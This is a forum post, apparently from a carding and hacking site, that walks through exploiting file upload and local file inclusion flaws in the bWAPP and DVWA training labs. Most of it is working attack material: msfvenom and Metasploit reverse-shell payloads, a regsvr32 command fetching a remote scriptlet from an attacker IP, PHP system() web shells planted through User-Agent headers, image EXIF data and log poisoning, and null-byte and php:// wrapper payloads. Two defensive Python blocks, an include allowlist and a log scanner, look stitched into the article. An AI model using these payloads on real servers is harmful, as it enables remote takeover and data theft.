Blackhat Carding Forum | Carding Forum - Credit Cards - Hacking Forum - Cracking Forum | Bhcforums.cc
[Guide] How to File Upload Exploitation in bWAPP (Bypass All Security) - Printable Version




[Guide] How to File Upload Exploitation in bWAPP (Bypass All Security) - NINZA - 04-26-2020

In this article, you will learn how to bypass all three security levels of the Unrestricted File Upload bug in bWAPP. If you want to know more about the various kinds of file upload vulnerability, read the previous article; it will help you understand this one more clearly.
Low Security
Open the target IP in the browser: 192.168.0.106/bWAPP/login.php. Enter the user and password as bee and bug respectively.
Set the security level to low, choose the bug Unrestricted File Upload from the list box and click on Hack.
[Image: 1.png?w=687&ssl=1]
Create a PHP backdoor using msfvenom and start multi/handler in the background; from the screenshot, you can see I have browsed to meter.php to upload it as an image to the web server.
[Image: 2.png?w=687&ssl=1]
When the image is successfully uploaded, the web server returns a link to the directory where the image is saved so you can view it. Since we have not uploaded a real image, we execute our PHP backdoor by clicking the link "here".
[Image: 3.png?w=687&ssl=1]
When the link "here" is clicked, we get the victim's reverse connection as a meterpreter session inside the Metasploit framework.
From the screenshot, you can see Metasploit session 1 is opened.
[Image: 4.png?w=687&ssl=1]
Medium Security
As the security level changes, the same procedure no longer works. Here you only need to change the extension of your PHP backdoor to bypass medium security; in the image below you can see that I have browsed to meter.php3 for uploading.
[Image: 6.png?w=687&ssl=1]
Now repeat the same steps: run multi/handler in the background and click the link "here" to receive the meterpreter session.
[Image: 7.png?w=687&ssl=1]
Great!!! From the screenshot, you can see Metasploit session 2 is opened.
[Image: 8.png?w=687&ssl=1]
High Security
Now we enter high security, where both of the file upload attacks above fail, so again you need to make a small change to the extension of the PHP backdoor before uploading it to the web server.
From the screenshot, you can read the file name high.php.png, which I browsed to for uploading.
[Image: 10.png?w=687&ssl=1]
Here our file is uploaded successfully; now right-click the link "here" to copy the link location, and keep multi/handler running in the background.
[Image: 11.png?w=687&ssl=1]
To bypass high security of file upload in bWAPP we need to switch both the bug and the security level.
Set the security level to low, choose the bug Remote & Local File Inclusion and click on Hack.
[Image: 12.png?w=687&ssl=1]
The requested web page, which suffers from the RFI & LFI vulnerability, opens. You will find a prompt to select a language from the drop-down list, and when you click the Go button the selected language file is included via the URL.
[Image: 13.png?w=687&ssl=1]
I uploaded the PHP backdoor shell under high security, but I execute it under low security with the help of the LFI vulnerability. Now manipulate the URL shown in the screenshot into:
192.168.0.106/bWAPP/rlfi.php?language=images/high.php.png

[Image: 14.png?w=687&ssl=1]
When the above URL is executed in the browser you get the victim's reverse connection inside Metasploit.
Congrats!!! From the screenshot, you can see Metasploit session 3 is opened.
Hence we have bypassed all three security levels inside bWAPP.
[Image: 15.png?w=687&ssl=1]

The main aim of this article is to share ideas for attacking a web server that suffers from a file inclusion vulnerability, using various techniques. As we all know, an LFI vulnerability allows a user to include a file through the URL in the browser. In this article I have used two different platforms, bWAPP and DVWA, which contain file inclusion vulnerabilities, and through them I have performed an LFI attack in FOUR different ways.
Basic Local file inclusion
Open the target IP in the browser and log in to bWAPP as bee:bug; now choose the bug Remote & Local File Inclusion and click on Hack.
[Image: 1.png?w=687]
The requested web page, which suffers from the RFI & LFI vulnerability, opens. You will find a prompt to select a language from the drop-down list, and when you click the Go button the selected language file is included via the URL. To perform the basic attack, manipulate the URL into
//192.168.1.101/bWAPP/rlfi.php?language=/etc/passwd

In a basic LFI attack we can directly read the content of a file from its directory using (../) or simply (/); if you look at the screenshot below you will see that I accessed the password file when the above URL was executed in the browser.
[Image: 2.png?w=687]
Null byte
In some scenarios the basic local file inclusion attack above may not work due to the high security level. From the image below you can observe that I failed to read the password file when executing the same path in the URL. When we face this kind of problem, go for the NULL BYTE attack.
Now turn on Burp Suite to capture the browser request, select the Proxy tab and start intercepting. Do not forget to set the browser proxy while using Burp Suite.
[Image: 3.1.png?w=687]
Now, inside Burp Suite, send the intercepted data to the Repeater.
[Image: 3.2.png?w=687]
Inside Repeater you can analyse the sent request and the response it generates. From the screenshot it is clear that /etc/passwd is not working and I am not able to read the password file.
[Image: 3.3.png?w=687]
From the following screenshot you can see I forwarded the request after adding a null character (%00) at the end of the path, /etc/passwd%00, and clicked on Go. Then, on the right side of the window, the password file opens as the response.
[Image: 3.4.png?w=687]
Base64 encoded
There is another way to exploit LFI when the security level is high and you are unable to view PHP file content: use the php://filter wrapper as follows.
//192.168.1.101/bWAPP/rlfi.php?language=php://filter/read=convert.base64-encode/resource=/etc/passwd

From the screenshot you can see the content of the password file is base64-encoded; copy the whole encoded text.
[Image: 3.png?w=687]
I am using HackBar, a Firefox plugin, to decode the copied text.
[Image: 4.png?w=687]
A pop-up box opens; paste the copied encoded text inside it and click on OK.
[Image: 5.png?w=687]
From the screenshot you can view the result and read the content of the password file.
[Image: 6.png?w=687]
PHP Input
Using the php://input wrapper we will execute injected PHP code to exploit the LFI vulnerability. With the help of HackBar I am going to perform this task; first we need to load the URL of the targeted web page as you can see in the screenshot.
//192.168.1.101/bWAPP/rlfi.php?language=lang_en.php&action=go

[Image: 11.png?w=687]
Now manipulate the above URL using the php://input wrapper:
//192.168.1.101/bWAPP/rlfi.php?language=php://input&cmd=ls

Then tick the checkbox to enable Post data, which sends the request as a POST, and add the cmd comment
<?php system($_GET['cmd']); ?>
in the given text area as shown in the following screenshot; finally click on Execute.
This will show the directories of the victim PC.
[Image: 12.png?w=687]
Now it is time to connect to the victim through a reverse connection; open a terminal in Kali Linux and type msfconsole to start the Metasploit framework.
use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set target 1
msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp
msf exploit(web_delivery) > set lhost 192.168.0.104
msf exploit(web_delivery) > set srvport 8081
msf exploit(web_delivery) > exploit

Copy the highlighted text shown in the window below.
[Image: 13.png?w=687]
Paste the above-copied PHP code into the URL as shown in the image and execute it.
[Image: 14.png?w=687]
When the above URL is executed, the attacker gets the victim's meterpreter session inside Metasploit.
msf exploit(web_delivery) > sessions -i 1
meterpreter > sysinfo

[Image: 15.png?w=687]
/proc/self/environ
If the server is outdated, we can exploit it through LFI by including the /proc/self/environ file, which stores the User-Agent; we will place our PHP code there to execute a CMD command.
//192.168.1.102/dvwa/vulnerabilities/fi/?page=proc/self/environ

[Image: 16.png?w=687]
Now start Burp Suite, capture the browser request and send the intercepted data to the Repeater.
[Image: 17.png?w=687]
Add the cmd comment
<?php system($_GET['cmd']); ?>
inside the User-Agent and send the request with the GET parameter
192.168.1.8/lfi/lfi.php?file=/var/www/apache2/access.log&cmd=id
as shown in the image below. On the right side of the window you can see the highlighted result as the response.
[Image: 18.png?w=687]

In this article, we demonstrate how a PHP file with an include function can lead to an LFI log injection attack on any web server. Please read our previous articles on configuring your own web server and on the LFI vulnerability; they will help you follow this one.

Attacker: Kali Linux
Target: Ubuntu
Create a PHP file which allows the user to include a file through a file parameter. Using that parameter we can execute a file that contains malicious code and gain unauthorized access to the target PC.
I saved the PHP code given below in a text file as lfi.php on the desktop.
<?php
// Deliberately vulnerable demo: the file name comes straight from the query
// string and reaches include() unchecked, which is what makes the LFI possible.
if (isset($_GET['file']))
{
    include($_GET['file']);
}
else
{
    include("index.php");
}
?>

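The four LFI variations above (direct path, null byte, php://filter, php://input and /proc/self/environ), the images/high.php.png include from the bWAPP section, and this lfi.php demo all share one root cause: the include parameter reaches include() unchecked. The Python code below is an added example, not bWAPP's, DVWA's or the article's own code, of how a defender resolves that parameter instead: decode it, refuse anything that is not a bare name from a fixed allowlist, and report which of this page's tricks a rejected value corresponds to. The allowlist entries other than lang_en.php and the directory path are assumptions made up for the example.

```python
import os
import re
from urllib.parse import unquote

# Allowlist of language files the page may include. lang_en.php is the name
# bWAPP uses on this page; the other two names are assumptions for the example.
ALLOWED_LANGUAGE_FILES = {"lang_en.php", "lang_fr.php", "lang_nl.php"}

# Directory the allowed files live in (assumed path for the example).
LANGUAGE_DIR = "/var/www/html/bWAPP"

# Anything with a scheme is a stream wrapper or remote URL, never a local file name.
WRAPPER_RE = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.IGNORECASE)


def classify_include_param(raw):
    """Return why `raw` must be rejected, or None if it may be included.

    `raw` is the parameter as it appears in the query string, so it is
    URL-decoded first: /etc/passwd%00 only contains a null byte after decoding.
    """
    value = unquote(raw)
    if "\x00" in value:
        return "null byte"
    if WRAPPER_RE.match(value):
        return "stream wrapper"          # php://filter, php://input, http://...
    if value.startswith(("/", "\\")):
        return "absolute path"           # /etc/passwd
    if ".." in re.split(r"[\\/]", value):
        return "directory traversal"     # ../../etc/passwd
    if value not in ALLOWED_LANGUAGE_FILES:
        return "not in allowlist"        # proc/self/environ, images/high.php.png
    return None


def resolve_include(raw):
    """Map a request parameter to the file path the application may include.

    Returns None for anything classify_include_param rejects; the caller then
    serves a default page instead of touching the filesystem.
    """
    if classify_include_param(raw) is not None:
        return None
    return os.path.join(LANGUAGE_DIR, unquote(raw))


if __name__ == "__main__":
    # The probes below are the values used on this page, replayed as test input.
    for probe in ("lang_en.php", "/etc/passwd", "/etc/passwd%00",
                  "php://filter/read=convert.base64-encode/resource=/etc/passwd",
                  "php://input", "proc/self/environ", "images/high.php.png",
                  "../../etc/passwd"):
        print(f"{probe!r:70} -> {classify_include_param(probe)}")
```

In PHP the same check is a comparison against a fixed array before include(), with allow_url_include=Off in php.ini so that php://input and remote URLs are refused regardless of the application code. The base64 trick through php://filter falls to the same allowlist, because a wrapper is never a bare file name, and the earlier checks exist only to give a precise reason for logging.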
[Image: 1.png?w=687&ssl=1]
Now log in as the user "root" and create a folder "lfi" inside /var/www/html:
cd /var/www/html
mkdir lfi

Move the lfi.php file from the desktop to /var/www/html using the command below.
mv /home/raj/Desktop/lfi.php .

[Image: 2.png?w=687&ssl=1]
Since we have added a PHP file with an include function inside /var/www/html, which allows reading the content of another file through it, it can lead to an LFI attack. Let's demonstrate by browsing to the following URL to read the password file:
localhost/lfi/lfi.php?file=/etc/passwd

From the image you can observe that the above URL dumped the result shown below.
[Image: 3.png?w=687&ssl=1]
Now I will try to open the Apache access.log file through lfi.php in the browser; therefore give read and write permission on the apache2 log directory and then include the access.log file.
chmod 775 -R /var/log/apache2

[Image: 4.png?w=687&ssl=1]
Now include the access.log file as the file parameter by entering the following URL in the browser.
192.168.1.129/lfi/lfi.php?file=/var/log/apache2/access.log

From the image you can see the Apache logs displayed in the browser. Now turn on Burp Suite to capture the request for the same web page.
[Image: 5.png?w=687&ssl=1]
Here you get the intercepted data; we need to inject our cmd comment into the User-Agent by replacing the highlighted data.
Add the cmd comment
<?php system($_GET['c']); ?>
inside the User-Agent and send the request with the GET parameter as shown in the image below. Then click on Forward.
[Image: 7.png?w=687&ssl=1]
Here it dumps the log data and also executes the command given through cmd. From the screenshot you can view both the logs and the process state.
[Image: 8.png?w=687&ssl=1]
In the same manner, execute ifconfig through cmd to verify the network interface, or browse the following URL and view the result in the screenshot.
192.168.1.129/lfi/lfi.php?file=/var/log/apache2/access.log&c=ifconfig

[Image: 9.png?w=687&ssl=1]
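The /proc/self/environ trick above and this access.log injection work the same way: a PHP tag is written into a file that the server later includes, and in the access.log case the tag also lands in the web server's own log. The Python code below is an added example, not part of the article, of the detection a defender would run over Apache combined-format logs. It flags requests whose User-Agent, Referer or request line carries a PHP open tag, and requests whose include parameter (file, page or language, the parameter names used by the pages in this article) points at a log file, /proc/self/environ, a stream wrapper, an absolute path or a traversal. The log lines are constructed for the example; the hosts, paths and agents in them are made up.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache "combined" log format: host ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# A PHP open tag in any logged field is the log-poisoning signature.
PHP_TAG_RE = re.compile(r"<\?(php\b|=)", re.IGNORECASE)

# Query parameters the vulnerable pages in this article use to name the included file.
INCLUDE_PARAMS = {"file", "page", "language"}

# Include values that point outside the application's own files.
SUSPICIOUS_INCLUDE_RE = re.compile(
    r"^[\\/]|\.\.[\\/]|://|\x00|proc/self/environ|/var/log/|\.log$",
    re.IGNORECASE,
)

# Constructed sample log; hosts, paths and agents are made up for this example.
SAMPLE_ACCESS_LOG = r'''
192.168.1.5 - - [10/Apr/2020:10:01:02 +0000] "GET /lfi/lfi.php?file=/etc/passwd HTTP/1.1" 200 2143 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.168.1.5 - - [10/Apr/2020:10:01:40 +0000] "GET /lfi/lfi.php?file=/var/log/apache2/access.log HTTP/1.1" 200 8811 "-" "<?php system($_GET['c']); ?>"
192.168.1.5 - - [10/Apr/2020:10:02:11 +0000] "GET /lfi/lfi.php?file=/var/log/apache2/access.log&c=ifconfig HTTP/1.1" 200 9102 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.168.1.7 - - [10/Apr/2020:10:03:00 +0000] "GET /dvwa/vulnerabilities/fi/?page=proc/self/environ HTTP/1.1" 200 1320 "-" "Mozilla/5.0"
192.168.1.9 - - [10/Apr/2020:10:04:00 +0000] "GET /bWAPP/rlfi.php?language=lang_en.php&action=go HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
'''


def parse_line(line):
    """Split one combined-format line into its fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def include_values(target):
    """Decoded values of the include parameters found in a request target."""
    query = urlsplit(target).query
    return [v for k, v in parse_qsl(query, keep_blank_values=True)
            if k.lower() in INCLUDE_PARAMS]


def scan_access_log(text):
    """Return one finding per (line, rule) hit, in log order."""
    findings = []
    for lineno, line in enumerate(text.strip().splitlines(), start=1):
        rec = parse_line(line)
        if rec is None:
            findings.append({"line": lineno, "ip": None, "rule": "unparseable"})
            continue
        # Rule 1: PHP code planted in a field that ends up in the log.
        for field in ("agent", "referer", "target"):
            if PHP_TAG_RE.search(unquote(rec[field])):
                findings.append({"line": lineno, "ip": rec["ip"],
                                 "rule": "php_tag_in_" + field})
        # Rule 2: the include parameter names something other than an application file.
        for value in include_values(rec["target"]):
            if SUSPICIOUS_INCLUDE_RE.search(value):
                findings.append({"line": lineno, "ip": rec["ip"],
                                 "rule": "suspicious_include", "value": value})
                break
    return findings


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_ACCESS_LOG):
        print(hit)
```

On the sample, the second line fires both rules (the PHP tag in the User-Agent and the log file named in the include parameter); a rule 1 hit on a real access.log means the log is already poisoned, so rotate it before any page can include it again, and rule 2 hits are the probes that precede the poisoning.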
If you find this kind of vulnerability in a web application, you can use the Metasploit platform to exploit the web server.
use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set target 1
msf exploit(web_delivery) > set lhost 192.168.1.123
msf exploit(web_delivery) > set srvport 8081
msf exploit(web_delivery) > set payload php/meterpreter/reverse_tcp
msf exploit(web_delivery) > exploit

Copy the highlighted text shown in the window below.
[Image: 10.png?w=687&ssl=1]
Paste the above-copied malicious code into the URL as shown in the image and execute it as a command.
[Image: 11.png?w=687&ssl=1]
When the above code is executed you get meterpreter session 1.
msf exploit(web_delivery) > sessions 1
meterpreter > sysinfo

[Image: 12.png?w=687&ssl=1]

In this article, you will learn how to bypass the file upload vulnerability at high security through the FILE INCLUSION vulnerability, as well as how to use local file inclusion to get a reverse connection to the victim's PC.
Attacker: Kali Linux
Target: DVWA
First, you need to download the Exif Pilot tool. This is a GUI tool for Windows users which allows adding EXIF and metadata inside JPEG, PNG and GIF images.

Now open Exif Pilot and insert any image to hide the malicious comment inside it; from the screenshot you can see I have chosen the image shell.png, then click on EDIT EXIF/IPTC.
[Image: 1.png?w=687&ssl=1]
Then, inside the Comment text field, type
<?php system($_GET['c']); ?>
as the malicious code and click on OK.
[Image: 2.png?w=687&ssl=1]
The EXIF data has now been edited successfully inside the image. The tool replaces the original image with the modified one in the same folder and sends the original image to the recycle bin.
[Image: 3.png?w=687&ssl=1]
Now browse to the target IP and log in to DVWA with admin:password as the credentials. Set the security level to high.
[Image: 4.png?w=687&ssl=1]
Choose the File Upload vulnerability to upload the malicious image to the web application; browse to your malicious image shell.png and click on Upload.
[Image: 5.png?w=687&ssl=1]
It shows the path of the uploaded image; copy the highlighted path.
[Image: 6.png?w=687&ssl=1]
Now open the copied path in the browser, where you will find the uploaded image.
[Image: 7.png?w=687&ssl=1]
In order to execute the malicious code, we need to change the vulnerability category as well as the security level so that we can execute the comment hidden inside the image.
Now set the security level to low.
To bypass the file upload vulnerability at high security in DVWA we need to use another vulnerability, and I have selected File Inclusion for this purpose.
File Inclusion allows users to execute any file through the URL, as I described above.
[Image: 9.png?w=687&ssl=1]
Now paste the above-copied path of the uploaded image into the URL as shown in the screenshot.
Here it gives the warning "system(): Cannot execute a blank command", which means we need to add a command for execution; through the URL we will then be able to execute any command.
[Image: 10.png?w=687&ssl=1]

Here I check the network configuration of the victim's PC, and you can see the result in the screenshot.
[Image: 11.png?w=687&ssl=1]

Here you can view the directories I got by executing the dir command through the URL.
[Image: 12.png?w=687&ssl=1]
Next I will try to get a meterpreter session using Kali Linux.
Type msfconsole to load the Metasploit framework.
use exploit/windows/misc/regsvr32_applocker_bypass_server
msf exploit(regsvr32_applocker_bypass_server) > set lhost 192.168.1.103
msf exploit(regsvr32_applocker_bypass_server) > set lport 1234
msf exploit(regsvr32_applocker_bypass_server) > exploit

Copy the malicious command the module prints and send it to the victim.
[Image: 13.png?w=687&ssl=1]
Here paste the above .dll malicious code into the URL; when you run it in the browser, the attacker gets the victim's meterpreter session on his Kali Linux.
/s /n /u /i:http://192.168.1.103:8080/7vnJTV4ONLKkU19.sct scrobj.dll

[Image: 14.png?w=687&ssl=1]
msf exploit(regsvr32_applocker_bypass_server) > sessions 1
meterpreter > sysinfo

[Image: 15.png?w=687&ssl=1]
Second Way
In the second part we combine a malicious PHP file with an image, upload that malicious image to the web application server and then execute it in the same manner as above.
First download any .png/.jpg/.gif image and save it on the Desktop. Inside Kali Linux I have downloaded an image and saved it as "a.png" on the desktop. Now open the terminal and type the following command to append PHP code to the "a.png" image.
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.103 lport=4444 >> /root/Desktop/a.png

[Image: 16.png?w=687&ssl=1]
Let's verify whether the image contains the malicious code:
cat /root/Desktop/a.png

When you scroll down, you will find that the end of the image contains the PHP code. It means we have successfully created the malicious image, which is ready to upload to the web application server.
[Image: 17.png?w=687&ssl=1]
Now repeat the above process to upload the file to DVWA with the security level set to high. From the screenshot, you can see my "a.png" image is uploaded successfully to the web server.
Copy the highlighted path where the image is uploaded.
[Image: 18.png?w=687&ssl=1]
Before executing the image on the web server, start multi/handler in the background inside Kali Linux:
msf > use multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.103
msf exploit(handler) > set lport 4444
msf exploit(handler) > exploit

[Image: 19.png?w=687&ssl=1]
Again set the security level to low in DVWA, turn on the File Inclusion vulnerability and repeat the same process as above; now paste the above-copied path of the uploaded image into the URL and execute it, which provides a reverse connection to Kali Linux.
[Image: 20.png?w=687&ssl=1]
meterpreter > sysinfo

I have got a meterpreter session of the victim PC.
[Image: 21.png?w=687&ssl=1]